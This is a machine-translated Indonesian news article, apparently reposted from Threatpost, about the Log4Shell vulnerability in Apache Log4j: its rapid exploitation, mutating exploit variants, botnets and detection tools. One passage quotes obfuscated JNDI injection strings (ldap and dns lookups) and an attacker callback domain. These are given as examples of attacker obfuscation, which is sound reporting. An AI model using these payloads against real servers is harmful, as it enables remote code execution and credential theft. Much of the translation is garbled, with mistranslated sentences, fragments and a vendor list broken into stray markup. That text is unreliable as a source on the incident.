Log4Shell Memunculkan Mutasi Lebih Jahat

Posted on by Syauqi Wiryahasana

Internet memiliki kanker ganas yang menyebar cepat – atau dikenal sebagai eksploitasi perpustakaan logging Apache Log4j – yang telah bermutasi dengan cepat dan menarik kawanan penyerang sejak diungkapkan secara publik minggu lalu.

Sebagian besar serangan berfokus pada penambangan cryptocurrency yang dilakukan pada korban sepeser pun, seperti yang terlihat oleh Sophos, Microsoft dan perusahaan keamanan lainnya. Namun, penyerang secara aktif mencoba menginstal malware yang jauh lebih berbahaya pada sistem yang rentan juga.

Menurut peneliti Microsoft, di luar penambang koin, mereka juga telah melihat instalasi Cobalt Strike, yang dapat digunakan penyerang untuk mencuri kata sandi, merayap lebih jauh ke dalam peretasan. jaringan dengan gerakan lateral dan exfiltrate data.



Juga, itu bisa menjadi jauh lebih buruk. Peneliti keamanan siber di Check Point memperingatkan pada hari Senin bahwa evolusi telah menyebabkan lebih dari 60 mutasi yang lebih besar dan lebih kuat, semuanya muncul dalam waktu kurang dari satu hari.

“Sejak Jumat kami menyaksikan apa yang tampak seperti penindasan evolusioner, dengan variasi baru dari aslinya eksploitasi diperkenalkan dengan cepat: lebih dari 60 dalam waktu kurang dari 24 jam,” kata mereka.

Cacatnya, yang sangat mudah dieksploitasi, dinamai Log4Shell. Itu tinggal di perpustakaan logging Java di mana-mana Apache Log4j dan dapat memungkinkan eksekusi kode jarak jauh (RCE) yang tidak diautentikasi dan pengambilalihan server lengkap. Ini pertama kali muncul di situs yang melayani pengguna game favorit dunia, Minecraft, Kamis lalu, dan dieksploitasi di alam liar dalam beberapa jam setelah pengungkapan publik.

Mutations Dapat Mengaktifkan Eksploitasi untuk Melewati Perlindungan , keturunan ganas sekarang dapat dieksploitasi "baik melalui HTTP atau HTTPS (versi penjelajahan terenkripsi)," kata mereka.

Semakin banyak cara untuk mengeksploitasi kerentanan, semakin banyak alternatif penyerang yang harus melewati perlindungan baru yang telah dipompa keluar dengan panik. sejak Jumat, kata Check Point. “Itu berarti bahwa satu lapisan perlindungan tidak cukup, dan hanya postur keamanan berlapis-lapis yang akan memberikan perlindungan yang tangguh,” tulis mereka.

Karena permukaan serangan yang sangat besar yang ditimbulkannya, beberapa pakar keamanan menyebut Log4Shell sebagai bencana keamanan siber terbesar tahun ini, menempatkannya setara dengan keluarga bug keamanan Shellshock 2014 yang dieksploitasi oleh botnet komputer yang disusupi untuk melakukan serangan penolakan layanan (DDoS) terdistribusi dan pemindaian kerentanan dalam beberapa jam setelah pengungkapan awal.

Pergeseran Taktis

Selain variasi yang dapat lolos dari perlindungan , para peneliti juga melihat taktik baru.

Luke Richards, Pemimpin Intelijen Ancaman di perusahaan keamanan siber AI Vectra, mengatakan kepada Threatpost pada hari Senin bahwa upaya eksploitasi awal adalah panggilan balik dasar, dengan upaya eksploitasi awal berasal dari node TOR. Mereka kebanyakan menunjuk kembali ke "bingsearchlib[.]com," dengan eksploitasi yang diteruskan ke Agen Pengguna atau Uniform Resource Identifier (URI) dari permintaan.

Tapi sejak gelombang awal upaya eksploitasi, Vectra telah melacak banyak perubahan dalam taktik oleh aktor ancaman yang memanfaatkan kerentanan. Khususnya, ada pergeseran dalam perintah yang digunakan, karena aktor ancaman mulai mengaburkan permintaan mereka.

“Ini awalnya termasuk memasukkan Agen Pengguna atau URI dengan string base64, yang ketika diterjemahkan oleh sistem yang rentan menyebabkan host mengunduh penetes jahat dari infrastruktur penyerang, ”jelas Richards dalam email. Setelah ini, penyerang mulai mengaburkan string Java Naming and Directory Interface (JDNI) itu sendiri, dengan memanfaatkan fitur terjemahan lain dari proses JDNI.

Dia menawarkan contoh berikut:

${jndi:${lower:l}${lower :d}a${lower:p}://world80 ${${env:ENV_NAME:-j}n${env:ENV_NAME:-d}i${env:ENV_NAME:-:}${env:ENV_NAME :-l}d${env:ENV_NAME:-a}p${env:ENV_NAME:-:}// ${jndi:dns://

…Semuanya mencapai tujuan yang sama: “untuk mengunduh kelas jahat file dan jatuhkan ke sistem target, atau untuk membocorkan kredensial sistem berbasis cloud, ”kata Richards.

Bug Telah Ditargetkan Sepanjang Bulan

Attacker telah berdengung di sekitar kerentanan Log4Shell sejak setidaknya 1 Desember, ternyata, dan segera saat CVE-2021-44228 diungkapkan kepada publik akhir pekan lalu, penyerang mulai mengerumuni honeypots.

Pada hari Minggu, peneliti Sophos mengatakan bahwa mereka “sudah mendeteksi ratusan ribu upaya sejak 9 Desember untuk mengeksekusi kode dari jarak jauh menggunakan kerentanan ini,” mencatat bahwa pencarian log oleh organisasi lain (termasuk Cloudflare) menunjukkan bahwa kerentanan mungkin telah dieksploitasi secara terbuka selama berminggu-minggu.
Sophos telah mendeteksi ratusan ribu upaya sejak 9 Desember untuk mengeksekusi kode dari jarak jauh menggunakan kerentanan ini, dan pencarian log oleh organisasi lain (termasuk Cloudflare) menyarankan kerentanan mungkin telah dieksploitasi secara terbuka selama berminggu-minggu. 11/16 pic.twitter.com/dbAXG5WdZ8

— SophosLabs (@SophosLabs) 13 Desember 2021



“Bukti paling awal yang kami temukan sejauh ini dari eksploitasi #Log4J adalah 2021-12-01 04:36:50 UTC,” CEO Cloudflare Matthew Pangeran mentweet pada hari Sabtu. “Itu menunjukkan itu di alam liar setidaknya sembilan hari sebelum diungkapkan ke publik. Namun, tidak melihat bukti eksploitasi massal sampai setelah pengungkapan publik.”

Pada hari Minggu, Cisco Talos menimpali dengan kerangka waktu yang sama: Pertama kali melihat aktivitas penyerang terkait dengan CVE-2021-44228 mulai 2 Desember. bahwa organisasi memperluas perburuan mereka untuk memindai dan mengeksploitasi aktivitas hingga saat ini,” sarannya.

Exploits Attempted on 40% of Corporate Networks

Check Point mengatakan pada hari Senin bahwa itu menggagalkan lebih dari 845.000 upaya eksploitasi, dengan lebih dari 46 persen dari upaya tersebut dilakukan oleh , kelompok jahat. Faktanya, Check Point memperingatkan bahwa telah terlihat lebih dari 100 upaya untuk mengeksploitasi kerentanan per menit.

Pada pukul 9 pagi ET pada hari Senin, para penelitinya telah melihat upaya eksploitasi pada lebih dari 40 persen jaringan perusahaan secara global.

Peta di bawah ini menggambarkan bagian atas geografi yang ditargetkan.
Geografi yang terpengaruh teratas. Sumber: Check Point.

Hyperbole tidak menjadi masalah dengan kekurangan ini. Pakar keamanan menilainya sebagai salah satu kerentanan terburuk tahun 2021, jika bukan yang paling mengerikan. Dor Dali, Direktur Keamanan Informasi di Vulcan Cyber, memasukkannya ke dalam tiga besar kelemahan terburuk tahun ini: “Tidak berlebihan untuk mengatakan bahwa setiap organisasi perusahaan menggunakan Java, dan Log4j adalah salah satu yang paling populer. logging framework untuk Java,” kata Dali melalui email, Senin. “Menghubungkan titik-titik, dampak kerentanan ini memiliki jangkauan dan potensi yang besar jika upaya mitigasi tidak segera dilakukan.”

As telah berulang kali ditekankan sejak pengungkapan publik awal, kerentanan Log4j “relatif mudah untuk dieksploitasi, dan kami telah melihat laporan yang dapat diverifikasi bahwa aktor jahat secara aktif menjalankan kampanye melawan beberapa perusahaan terbesar di dunia,” tegas Dali. “Semoga setiap organisasi yang menjalankan Java memiliki kemampuan untuk mengamankan, mengonfigurasi, dan mengelolanya. Jika Java digunakan dalam sistem produksi, tim keamanan TI harus memprioritaskan kampanye risiko dan mitigasi dan mengikuti pedoman perbaikan dari proyek Apache Log4j sesegera mungkin.”

Situasi ini berkembang pesat, jadi nantikan berita tambahan. Di bawah ini adalah beberapa bagian terkait yang telah kita lihat, bersama dengan beberapa alat perlindungan dan deteksi baru.

Berita Lebih Lanjut2hh
    Botnet Linux telah mengeksploitasi kelemahan tersebut. NetLab 360 melaporkan pada hari Sabtu bahwa dua honeypotnya telah diserang oleh Muhstik dan botnet Mirai. Setelah mendeteksi serangan tersebut, tim Netlab 360 menemukan botnet lain yang mencari kerentanan Log4Shell, termasuk keluarga DDoS Elknot, keluarga penambangan m8220, SitesLoader, xmrig.pe, xmring.ELF, alat serangan 1, alat serangan 2, ditambah satu tidak diketahui dan keluarga PE. BleepingComputer juga melaporkan bahwa mereka telah mengamati aktor ancaman di balik pintu belakang Kinsing dan botnet cryptomining “menyalahgunakan kerentanan Log4j secara berlebihan.”CISA telah menambahkan Log4Shell ke Katalog Kerentanan yang Diketahui yang Dieksploitasi.Quebec menutup ribuan situs setelah pengungkapan kelemahan Log4Shell. “”Kami perlu memindai semua sistem kami,” kata Menteri Kanada yang Bertanggung Jawab untuk Transformasi Digital dan Akses Informasi Eric Caire dalam konferensi pers. “Kami seperti mencari jarum di tumpukan jerami.”

Perlindungan Baru, Alat Deteksi2hh
    Pada hari Sabtu, Huntress Labs merilis alat – tersedia di sini – untuk membantu organisasi menguji apakah aplikasi mereka rentan terhadap CVE-2021-44228.Cybereason merilis Logout4Shell , sebuah “vaksin” untuk Log4Shell Apache Log4j RCE, yang menggunakan kerentanan itu sendiri untuk menyetel tanda yang mematikannya.

Daftar Produsen yang Terkena Dampak, Komponen yang Bertambah

Pada hari Senin, internet masih dalam mode tetesan yang meleleh, dengan pertumbuhan yang terus-menerus , daftar crowd-source yang dihosting di GitHub yang hanya menggores permukaan jutaan aplikasi dan produsen yang menggunakan log4j untuk logging. daftar menunjukkan apakah mereka dipengaruhi oleh Log4Shell dan menyediakan link ke bukti jika mereka are.

Spoiler peringatan: Sebagian besar, termasuk: camera
< ul>
  • Amazonliu < ul>iApache Druid
    • Apache SolrApache Struts2AppleBaiduliu < ul>iCloudFlareDIDIliu < ul>iElasticSearchliu < ul>iGoogleJDliu < ul>iLinkedInNetEaseliu < ul>iSpeed ​​LOLSteamliu < ul>iTeslaliu < ul>iTencentTwitterVMWareliu
      iVMWarevCenterWebex

    A Deep Dive dan lain Resources
      Immersive Labs telah diposting tangan-lab kejadian. Lacework telah menerbitkan entri blog mengenai bagaimana berita memengaruhi praktik terbaik keamanan di tingkat pengembang.NetSPI telah menerbitkan entri blog yang menyertakan detail tentang dampak Log4Shell, panduan untuk menentukan apakah organisasi Anda berisiko, dan rekomendasi mitigasi.

    Ini adalah pengembangan cerita – pantau terus Threatpost untuk liputan berkelanjutan.

    121321 13:32 PEMBARUAN 1: Masukan tambahan dari Dor Dali dan Luke Richards. 121321 14:15 UPDATE 2: Menambahkan botnet tambahan yang terdeteksi oleh NetLab 360.

    Ada lautan data tidak terstruktur di internet yang berkaitan dengan ancaman keamanan terbaru. DAFTAR HARI INI untuk mempelajari konsep kunci pemrosesan bahasa alami (NLP) dan cara menggunakannya untuk menavigasi lautan data dan menambahkan konteks ke ancaman keamanan siber (tanpa menjadi ahli!). Balai Kota Threatpost interaktif LANGSUNG ini, disponsori oleh Rapid 7, akan menampilkan peneliti keamanan Erick Galinkin dari Rapid7 dan Izzy Lazerson dari IntSights (perusahaan Rapid7), ditambah jurnalis Threatpost dan pembawa acara webinar, Becky Bracken.Daftar SEKARANG untuk acara LANGSUNG!
    Write a comment
    Bagikan artikel ini:
  • Cloud Securityliu < ul>iMalwareliu < ul>iKerentananliu
      iKeamanan Web

    • TENTANG EMKA.WEB>ID

    EMKA.WEB.ID adalah blog seputar teknologi informasi, edukasi dan ke-NU-an yang hadir sejak tahun 2011. Kontak: kontak@emka.web.id.

    ©2024 emka.web.id Proudly powered by wpStatically